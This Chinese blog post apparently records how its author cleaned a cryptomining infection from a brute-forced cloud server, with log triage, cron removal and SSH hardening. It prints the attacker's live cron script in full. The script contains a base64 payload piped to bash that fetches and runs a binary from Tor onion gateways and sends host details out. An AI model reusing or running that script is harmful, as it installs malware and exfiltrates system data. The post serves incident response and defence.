记录一次清理挖矿程序

之前的服务器密码设置的很简单，ssh的端口使用的默认端口22，很容易被别人暴力破解了

先查看一下暴力破解时使用的ip

[root@hostname ~]# find /var/log -name 'secure*' -type f | while read line;do awk '/Failed/{print $(NF-3)}' $line;done | awk '{a[$0]++}END{for (j in a) if(a[j] > 20) print j"="a[j]}' | sort -n -t'=' -k 2
82.156.118.142=23
36.155.9.133=84
182.92.112.94=127
182.92.178.16=1880
182.92.156.24=3992
182.92.107.110=4113

接下来就干掉这个挖矿程序

[root@hostname ~]# top

找到挖矿程序的pid 进入这个进程的目录找一下文件位置

[root@hostname ~]# cd /proc/196121
[root@hostname 196121]# ll

dr-xr-xr-x 2 root root 0 Mar  2 12:53 attr
-rw-r--r-- 1 root root 0 Mar  2 13:19 autogroup
-r-------- 1 root root 0 Mar  2 13:19 auxv
-r--r--r-- 1 root root 0 Mar  2 13:19 cgroup
--w------- 1 root root 0 Mar  2 13:19 clear_refs
-r--r--r-- 1 root root 0 Mar  2 12:53 cmdline
-rw-r--r-- 1 root root 0 Mar  2 12:54 comm
-rw-r--r-- 1 root root 0 Mar  2 13:19 coredump_filter
-r--r--r-- 1 root root 0 Mar  2 13:19 cpuset
lrwxrwxrwx 1 root root 0 Mar  2 13:19 cwd -> /
-r-------- 1 root root 0 Mar  2 13:19 environ
lrwxrwxrwx 1 root root 0 Mar  2 13:19 exe -> '/root/864954f50a56c303d427168efc739e93'

可能是root目录下的一个文件不确定是哪个文件

[root@hostname ~]# cd /root
[root@hostname ~]# ls -a
.   aegis_install.sh  .bash_logout   .bashrc  .config  install.sh  package.xml  .pip              .python_history  .systemd-service.sh  .viminfo
..  .bash_history     .bash_profile  .cache   .cshrc   .npmrc      .pearrc      .pydistutils.cfg  .ssh             .tcshrc              .wget-hsts

查看一下定时任务是否存在异常信息

[root@hostname ~]# crontab -l
44 * * * * /root/.systemd-service.sh > /dev/null 2>&1 &

查看一下这个文件吧

[root@hostname ~]# vi .systemd-service.sh#!/bin/bash
exec &>/dev/null
echo bhajQKVmnmwXJTe4r3ZpAgfJzVxELCErQ/WVBdKALcIpzlP8lOUlY7Z8/eyGdDFC
echo YmhhalFLVm1ubXdYSlRlNHIzWnBBZ2ZKelZ4RUxDRXJRL1dWQmRLQUxjSXB6bFA4bE9VbFk3WjgvZXlHZERGQwpleGVjICY+L2Rldi9udWxsCmV4cG9ydCBQQVRIPSRQQVRIOiRIT01FOi9iaW46L3NiaW46L3Vzci9iaW46L3Vzci9zYmluOi91c3IvbG9jYWwvYmluOi91c3IvbG9jYWwvc2JpbgoKZD0kKGdyZXAgeDokKGlkIC11KTogL2V0Yy9wYXNzd2R8Y3V0IC1kOiAtZjYpCmM9JChlY2hvICJjdXJsIC00ZnNTTGtBLSAtbTIwMCIpCnQ9JChlY2hvICI1aXhoaWVlem96eHdudmlzb3BneG9iYTZzc2JzcnZkcHhlZHV4YjRqYzZ6eDdzNTZydWZyanphZCIpCgpzb2NreigpIHsKbj0oZG9oLmRlZmF1bHRyb3V0ZXMuZGUgZG5zLmhvc3R1eC5uZXQgdW5jZW5zb3JlZC5sdXgxLmRucy5uaXhuZXQueHl6IGRucy5ydWJ5ZmlzaC5jbiBkbnMudHduaWMudHcgZG9oLmNlbnRyYWxldS5waS1kbnMuY29tIGRvaC5kbnMuc2IgZG9oLWZpLmJsYWhkbnMuY29tIGZpLmRvaC5kbnMuc25vcHl0YS5vcmcgZG5zLmZsYXR1c2xpZmlyLmlzIGRvaC5saSBkbnMuZGlnaXRhbGUtZ2VzZWxsc2NoYWZ0LmNoKQpwPSQoZWNobyAiZG5zLXF1ZXJ5P25hbWU9cmVsYXkudG9yMnNvY2tzLmluIikKcz0kKCRjIGh0dHBzOi8vJHtuWyQoKFJBTkRPTSUxMCkpXX0vJHAgfCBncmVwIC1vRSAiXGIoWzAtOV17MSwzfVwuKXszfVswLTldezEsM31cYiIgfHRyICcgJyAnXG4nfGdyZXAgLUV2IFsuXTB8c29ydCAtdVJ8aGVhZCAtbiAxKQp9CgpmZXhlKCkgewpmb3IgaSBpbiAuICRIT01FIC91c3IvYmluICRkIC92YXIvdG1wIDtkbyBlY2hvIGV4aXQgPiAkaS9pICYmIGNobW9kICt4ICRpL2kgJiYgY2QgJGkgJiYgLi9pICYmIHJtIC1mIGkgJiYgYnJlYWs7ZG9uZQp9Cgp1KCkgewpzb2NregpmPS9pbnQuJCh1bmFtZSAtbSkKeD0uLyQoZGF0ZXxtZDVzdW18Y3V0IC1mMSAtZC0pCnI9JChjdXJsIC00ZnNTTGsgY2hlY2tpcC5hbWF6b25hd3MuY29tfHxjdXJsIC00ZnNTTGsgaXAuc2IpXyQod2hvYW1pKV8kKHVuYW1lIC1tKV8kKHVuYW1lIC1uKV8kKGlwIGF8Z3JlcCAnaW5ldCAnfGF3ayB7J3ByaW50ICQyJ318bWQ1c3VtfGF3ayB7J3ByaW50ICQxJ30pXyQoY3JvbnRhYiAtbHxiYXNlNjQgLXcwKQokYyAteCBzb2NrczVoOi8vJHM6OTA1MCAkdC5vbmlvbiRmIC1vJHggLWUkciB8fCAkYyAkMSRmIC1vJHggLWUkcgpjaG1vZCAreCAkeDskeDtybSAtZiAkeAp9Cgpmb3IgaCBpbiB0b3Iyd2ViLmluIHRvcjJ3ZWIuaXQgb25pb24uZm91bmRhdGlvbiBvbmlvbi5jb20uZGUgb25pb24uc2ggdG9yMndlYi5zdSAKZG8KaWYgISBscyAvcHJvYy8kKGhlYWQgLW4gMSAvdG1wLy5YMTEtdW5peC8wMSkvc3RhdHVzOyB0aGVuCmZleGU7dSAkdC4kaApscyAvcHJvYy8kKGhlYWQgLW4gMSAvdG1wLy5YMTEtdW5peC8wMSkvc3RhdHVzIHx8IChjZCAvdG1wO3UgJHQuJGgpCmxzIC9wcm9jLyQoaGVhZCAtbiAxIC90bXAvLlgxMS11bml4LzAxKS9zdGF0dXMgfHwgKGNkIC9kZXYvc2htO3UgJHQuJGgpCmVsc2UKYnJlYWsKZmkKZG9uZQo=|base64 -d|bash

使用base64加密了还是先干掉他吧

[root@hostname ~]# kill -9 196121  //杀掉进程
[root@hostname ~]# crontab -e   //删除定时任务 找到那一条删除掉 保存退出就行了
[root@hostname ~]# rm -f .systemd-service.sh   //删除脚本文件
[root@hostname ~]# cat /etc/passwd //检查是否存在未知用户
[root@hostname ~]# cat ~/.ssh/authorized_keys  //检查是否对未知用户授权
[root@hostname ~]# cat ~/.ssh/known_hosts //检查是否有未知的用host 发现多了一条 删除掉
172.21.22.3 ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBJu5cssiIPbPPjyI8JGPqp7RCNFlzHpn5pbtlu0O2pNXtiM3Cm7J8gwXn9RRG4tw83YJD8ApmBUjXzCt4wxRNaQ=
#下面的内容中存在异常信息就删除掉
[root@hostname ~]# vi /etc/rc.local  //用于添加开机启动命令
[root@hostname ~]# vi /etc/rc.d/rc.sysinit  //配置文件初始化Linux系统
[root@hostname ~]# vi /etc/inittab  //init进程就是根据/etc/inittab这个文件来在不同的运行级别启动相应的进程或执行相应的操作
[root@hostname ~]# vi /etc/profile  //系统环境变量

修改掉ssh默认端口号删除掉Port 22前面的#，然后下一行输入新的端口号如：Port 2365（这个你自己定，最大不能超过65535）

[root@hostname ~]# vim /etc/ssh/sshd_config

我是用的是阿里云的服务器需要在阿里云控制台配置安全组打开2365端口记得关闭22端口
然后重启ssh服务就可以了

[root@hostname ~]# systemctl restart sshd.service

可以安装下clamav杀毒软件扫描下是否存在蠕虫病毒或者是否留有后门

安装方法 https://www.jianshu.com/p/e3d64cc80e6f

挖矿程序的代码后面会发布出来

记录一次清理挖矿程序相关推荐

记一次简单的清理挖矿程序过程-kdevtmpfsi
服务器CPU被跑满了,是一个名为'kdevtmpfsi'的程序 1:第一步要先找到这个kdevtmpfsi文件实体,对了还有一个叫ddg.2020的进程. find / -name kdevtmpfs ...
ubuntu清理挖矿病毒
0 序言我之前搭建的hadoop用于测试,直接使用了8088和9870端口,没有放入docker,从而没有端口映射.于是,就被不法之徒盯上了,hadoop被提交了很多job,使得系统被感染了挖矿病毒 ...
## 记录一次简单的xmrig挖矿程序清理
记录一次简单的xmrig挖矿程序清理晚上闲着没事逛逛网站无意间发现cpu居然一直处于99.9的状态. 5.9 linux服务器,2核4G contos 7 小白一枚,还在纳闷是什么东西占了这么多的资 ...
移除挖矿程序过程记录
前言: 早上发现一个服务器的挖矿程序预警消息: 那么接下来开始处理这个问题, 废话不说直接上有效的操作了: 1.查看系统定时任务及修改: 查看系统定时任务:方式一:crontab -lcrontab ...
记一次个人服务器被nicehash挖矿，排查挖矿程序记录
一:早上起来,发现短信邮箱都收到阿里云提示,租赁的一台虚拟云服务器,异地登录,被植入挖矿程序的提示: 二:打开电脑,终端连接服务器,发现登录不进去,第一反应,远程连接密码被修改,登录阿里云控制台,修改 ...
查杀 libudev.so 和 XMR 挖矿程序记录
这两天使用的公网服务器被入侵了,而且感染了不止一种病毒:一种是 libudev.so,是 DDoS 的客户端,现象就是不停的向外网发包,也就是超目标发起 DDoS 攻击:另外一种是挖矿程序,除了发包之 ...
记录ECS Linux系统出现xmrig挖矿程序
记录ECS Linux系统出现xmrig挖矿程序最近收到阿里云检测服务器出现了紧急安全事件:挖矿程序,炸一看,额...... ,吓了一跳,这是哪里冒出来的,结果看到如下图所示,开始进行了排查. 原因 ...
解决：服务器种挖矿程序的一次实战记录~
早上来公司,客户报系统不能登陆了.我以为简单的应用挂机问题,后来发现是cpu超200.直接使服务器宕机!猜测是被植入了挖矿程序,后来经过证实果然是.于是开始和植马的狠人斗智斗勇.用尽浑身解数终于解码. ...
【警惕】大量未修复WebLogic WSAT组件RCE漏洞的主机被挖矿程序攻击
警惕从1月1日开始,大量未修复WebLogic WSAT(全称:Web Services Atomic Transactions)组件RCE漏洞的主机被挖矿程序攻击,尤其是1月3日,更是大面积爆发 ...

记录一次清理挖矿程序

记录一次清理挖矿程序相关推荐

最新文章

热门文章